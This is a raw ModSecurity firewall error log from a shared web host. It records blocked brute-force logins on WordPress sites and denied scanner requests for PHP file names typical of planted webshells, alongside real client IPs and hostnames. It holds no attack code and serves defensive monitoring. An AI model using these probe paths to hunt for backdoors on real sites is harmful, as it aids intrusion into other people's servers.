[Tue May 26 19:02:02.361061 2026] [security2:error] [pid 1045635:tid 1045781] [client 20.151.130.61:59579] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-content/"] [unique_id "ahWg0hhDcQXYr7SS5sUaUwAAABA"]
[Tue May 26 19:02:02.393832 2026] [security2:error] [pid 1045635:tid 1045840] [client 34.195.212.30:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWg0hhDcQXYr7SS5sUaWQAAAEs"]
[Tue May 26 19:02:02.394456 2026] [security2:error] [pid 1045635:tid 1045798] [client 34.195.212.30:60028] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWg0hhDcQXYr7SS5sUaVwAAACE"]
[Tue May 26 19:02:02.505563 2026] [security2:error] [pid 1045635:tid 1045639] [remote 178.104.164.71:60582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWg0hhDcQXYr7SS5sUaUgAAVAM"]
[Tue May 26 19:02:02.587943 2026] [security2:error] [pid 1045635:tid 1045831] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg0hhDcQXYr7SS5sUaSAAAAEI"]
[Tue May 26 19:02:02.730599 2026] [security2:error] [pid 1045635:tid 1045878] [client 34.195.212.30:60042] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahWg0hhDcQXYr7SS5sUaaQAAAHE"]
[Tue May 26 19:02:02.852159 2026] [security2:error] [pid 1045635:tid 1045879] [client 20.206.111.203:4593] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/puc.php"] [unique_id "ahWg0hhDcQXYr7SS5sUabwAAAHI"]
[Tue May 26 19:02:02.852264 2026] [security2:error] [pid 1045635:tid 1045879] [client 20.206.111.203:4593] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/puc.php"] [unique_id "ahWg0hhDcQXYr7SS5sUabwAAAHI"]
[Tue May 26 19:02:02.938153 2026] [security2:error] [pid 1045635:tid 1045871] [client 20.151.130.61:19647] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWg0hhDcQXYr7SS5sUacAAAAGo"]
[Tue May 26 19:02:03.013791 2026] [security2:error] [pid 1045635:tid 1045811] [client 20.151.130.61:59579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/simple.php"] [unique_id "ahWg0xhDcQXYr7SS5sUacQAAAC4"]
[Tue May 26 19:02:03.013939 2026] [security2:error] [pid 1045635:tid 1045811] [client 20.151.130.61:59579] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/simple.php"] [unique_id "ahWg0xhDcQXYr7SS5sUacQAAAC4"]
[Tue May 26 19:02:03.386571 2026] [security2:error] [pid 1045635:tid 1045791] [client 20.206.111.203:5070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahWg0xhDcQXYr7SS5sUaigAAABo"]
[Tue May 26 19:02:03.386658 2026] [security2:error] [pid 1045635:tid 1045791] [client 20.206.111.203:5070] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahWg0xhDcQXYr7SS5sUaigAAABo"]
[Tue May 26 19:02:03.562753 2026] [security2:error] [pid 1045635:tid 1045883] [client 20.151.130.61:31336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/kj.php"] [unique_id "ahWg0xhDcQXYr7SS5sUalwAAAHY"]
[Tue May 26 19:02:03.562864 2026] [security2:error] [pid 1045635:tid 1045883] [client 20.151.130.61:31336] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/kj.php"] [unique_id "ahWg0xhDcQXYr7SS5sUalwAAAHY"]
[Tue May 26 19:02:03.892176 2026] [security2:error] [pid 1045635:tid 1045856] [client 20.151.130.61:59565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/xxx.php"] [unique_id "ahWg0xhDcQXYr7SS5sUaqAAAAFs"]
[Tue May 26 19:02:03.892281 2026] [security2:error] [pid 1045635:tid 1045856] [client 20.151.130.61:59565] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/xxx.php"] [unique_id "ahWg0xhDcQXYr7SS5sUaqAAAAFs"]
[Tue May 26 19:02:04.035261 2026] [security2:error] [pid 1045635:tid 1045858] [client 20.206.111.203:5085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahWg1BhDcQXYr7SS5sUaqQAAAF0"]
[Tue May 26 19:02:04.035387 2026] [security2:error] [pid 1045635:tid 1045858] [client 20.206.111.203:5085] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahWg1BhDcQXYr7SS5sUaqQAAAF0"]
[Tue May 26 19:02:04.316805 2026] [security2:error] [pid 1045635:tid 1045792] [client 20.151.130.61:19454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/hypo.php"] [unique_id "ahWg1BhDcQXYr7SS5sUaswAAABs"]
[Tue May 26 19:02:04.316906 2026] [security2:error] [pid 1045635:tid 1045792] [client 20.151.130.61:19454] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/hypo.php"] [unique_id "ahWg1BhDcQXYr7SS5sUaswAAABs"]
[Tue May 26 19:02:04.773135 2026] [security2:error] [pid 1045635:tid 1045880] [client 20.206.111.203:5066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahWg1BhDcQXYr7SS5sUaxgAAAHM"]
[Tue May 26 19:02:04.773233 2026] [security2:error] [pid 1045635:tid 1045880] [client 20.206.111.203:5066] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahWg1BhDcQXYr7SS5sUaxgAAAHM"]
[Tue May 26 19:02:04.883576 2026] [security2:error] [pid 1045635:tid 1045867] [client 193.37.33.107:29983] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWg1BhDcQXYr7SS5sUawQAAAGY"]
[Tue May 26 19:02:04.950184 2026] [security2:error] [pid 1045635:tid 1045825] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg1BhDcQXYr7SS5sUatgAAADw"]
[Tue May 26 19:02:07.526838 2026] [security2:error] [pid 1045635:tid 1045890] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg1xhDcQXYr7SS5sUbGwAAAH0"]
[Tue May 26 19:02:07.850807 2026] [security2:error] [pid 1045635:tid 1045779] [client 195.2.71.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWg1xhDcQXYr7SS5sUbLQAAAA4"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1419348&moderation-hash=7dbb62ec6009b8fd57931c4968ce2f90
[Tue May 26 19:02:08.735138 2026] [security2:error] [pid 1045635:tid 1045816] [client 34.90.199.112:49152] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "webmail.shahvishaal.com"] [uri "/"] [unique_id "ahWg2BhDcQXYr7SS5sUbTQAAADM"]
[Tue May 26 19:02:08.735240 2026] [security2:error] [pid 1045635:tid 1045816] [client 34.90.199.112:49152] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "webmail.shahvishaal.com"] [uri "/"] [unique_id "ahWg2BhDcQXYr7SS5sUbTQAAADM"]
[Tue May 26 19:02:08.760910 2026] [security2:error] [pid 1045635:tid 1045785] [client 195.2.71.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWg2BhDcQXYr7SS5sUbSwAAABQ"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1419348&moderation-hash=7dbb62ec6009b8fd57931c4968ce2f90
[Tue May 26 19:02:09.449251 2026] [security2:error] [pid 1045635:tid 1045853] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWg2BhDcQXYr7SS5sUbQwAAAFg"]
[Tue May 26 19:02:09.740770 2026] [security2:error] [pid 1045635:tid 1045798] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg2RhDcQXYr7SS5sUbWQAAACE"]
[Tue May 26 19:02:10.859411 2026] [security2:error] [pid 1045635:tid 1045816] [client 103.3.220.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg2hhDcQXYr7SS5sUbfAAAADM"]
[Tue May 26 19:02:12.242712 2026] [security2:error] [pid 1045635:tid 1045891] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg2xhDcQXYr7SS5sUboQAAAH4"]
[Tue May 26 19:02:13.798122 2026] [security2:error] [pid 1045635:tid 1045683] [remote 123.30.233.13:59454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWg3RhDcQXYr7SS5sUbzAAATy8"]
[Tue May 26 19:02:13.926119 2026] [security2:error] [pid 1045635:tid 1045869] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg3RhDcQXYr7SS5sUbyQAAAGg"]
[Tue May 26 19:02:13.960064 2026] [security2:error] [pid 1045635:tid 1045697] [remote 103.166.184.148:41372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.184.166.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWg3RhDcQXYr7SS5sUbzgAAaj0"]
[Tue May 26 19:02:14.677890 2026] [security2:error] [pid 1045635:tid 1045702] [remote 5.42.158.148:57300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWg3hhDcQXYr7SS5sUb4gAAXkI"]
[Tue May 26 19:02:17.073600 2026] [security2:error] [pid 1045635:tid 1045858] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg4BhDcQXYr7SS5sUcKQAAAF0"]
[Tue May 26 19:02:18.736078 2026] [security2:error] [pid 1045635:tid 1045837] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg4hhDcQXYr7SS5sUcYwAAAEg"]
[Tue May 26 19:02:22.275550 2026] [security2:error] [pid 1045635:tid 1045744] [remote 88.198.165.116:48140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWg5hhDcQXYr7SS5sUc6QAAXmw"]
[Tue May 26 19:02:22.899784 2026] [security2:error] [pid 1045635:tid 1045787] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg5hhDcQXYr7SS5sUc-wAAABY"]
[Tue May 26 19:02:23.878466 2026] [security2:error] [pid 1045635:tid 1045863] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg5xhDcQXYr7SS5sUdFAAAAGI"]
[Tue May 26 19:02:25.612414 2026] [security2:error] [pid 1045635:tid 1045839] [client 130.44.202.226:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWg6RhDcQXYr7SS5sUdZQAAAEo"], referer: https://www.anujtradingco.com/
[Tue May 26 19:02:25.816930 2026] [security2:error] [pid 1045635:tid 1045803] [client 185.191.171.12:47078] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahWg6RhDcQXYr7SS5sUdagAAACY"]
[Tue May 26 19:02:25.817080 2026] [security2:error] [pid 1045635:tid 1045803] [client 185.191.171.12:47078] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahWg6RhDcQXYr7SS5sUdagAAACY"]
[Tue May 26 19:02:26.029652 2026] [security2:error] [pid 1045635:tid 1045765] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg6RhDcQXYr7SS5sUdaAAAAAA"]
[Tue May 26 19:02:26.289091 2026] [security2:error] [pid 1045635:tid 1045652] [remote 217.112.89.35:47110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWg6hhDcQXYr7SS5sUdeAAAfxA"]
[Tue May 26 19:02:26.549156 2026] [security2:error] [pid 1045635:tid 1045673] [remote 217.112.89.35:47110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWg6hhDcQXYr7SS5sUdhQAAMiU"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 19:02:26.569791 2026] [security2:error] [pid 1045635:tid 1045879] [client 5.255.99.53:45754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.99.255.5.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahWg6hhDcQXYr7SS5sUdhgAAAHI"]
[Tue May 26 19:02:27.066511 2026] [security2:error] [pid 1045635:tid 1045798] [client 130.44.202.226:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWg6hhDcQXYr7SS5sUdmAAAACE"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1444431&moderation-hash=db854aec872b4e8b0761d9bdf145f418
[Tue May 26 19:02:28.436676 2026] [security2:error] [pid 1045635:tid 1045874] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg7BhDcQXYr7SS5sUduAAAAG0"]
[Tue May 26 19:02:28.573458 2026] [security2:error] [pid 1045635:tid 1045768] [client 5.255.99.53:54000] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.99.255.5.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWg7BhDcQXYr7SS5sUdvwAAAAM"], referer: https://rohiniventures.com/wp-admin/
[Tue May 26 19:02:28.854794 2026] [security2:error] [pid 1045635:tid 1045843] [client 20.206.67.134:3669] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-plain.php"] [unique_id "ahWg7BhDcQXYr7SS5sUd2QAAAE4"], referer: www.google.com
[Tue May 26 19:02:28.897402 2026] [security2:error] [pid 1045635:tid 1045839] [client 20.206.67.134:3724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWg7BhDcQXYr7SS5sUd2gAAAEo"], referer: www.google.com
[Tue May 26 19:02:29.591579 2026] [security2:error] [pid 1045635:tid 1045766] [client 20.206.67.134:3714] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWg7BhDcQXYr7SS5sUd2AAAAAE"], referer: www.google.com
[Tue May 26 19:02:29.591766 2026] [security2:error] [pid 1045635:tid 1045790] [client 20.206.67.134:3721] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWg7RhDcQXYr7SS5sUd8gAAABk"]
[Tue May 26 19:02:29.622673 2026] [security2:error] [pid 1045635:tid 1045685] [remote 103.166.184.148:58588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.184.166.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWg7RhDcQXYr7SS5sUd7gAAbzE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:02:29.867643 2026] [security2:error] [pid 1045635:tid 1045831] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWg7BhDcQXYr7SS5sUd3gAAAEI"]
[Tue May 26 19:02:30.578856 2026] [security2:error] [pid 1045635:tid 1045822] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg7hhDcQXYr7SS5sUeBgAAADk"]
[Tue May 26 19:02:31.142319 2026] [security2:error] [pid 1045635:tid 1045835] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWg7hhDcQXYr7SS5sUeBwAAAEY"]
[Tue May 26 19:02:32.388034 2026] [security2:error] [pid 1045635:tid 1045871] [client 23.158.233.122:63548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.233.158.23.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWg8BhDcQXYr7SS5sUeVwAAAGo"], referer: https://www.cagmedya.com/web-tasarim/
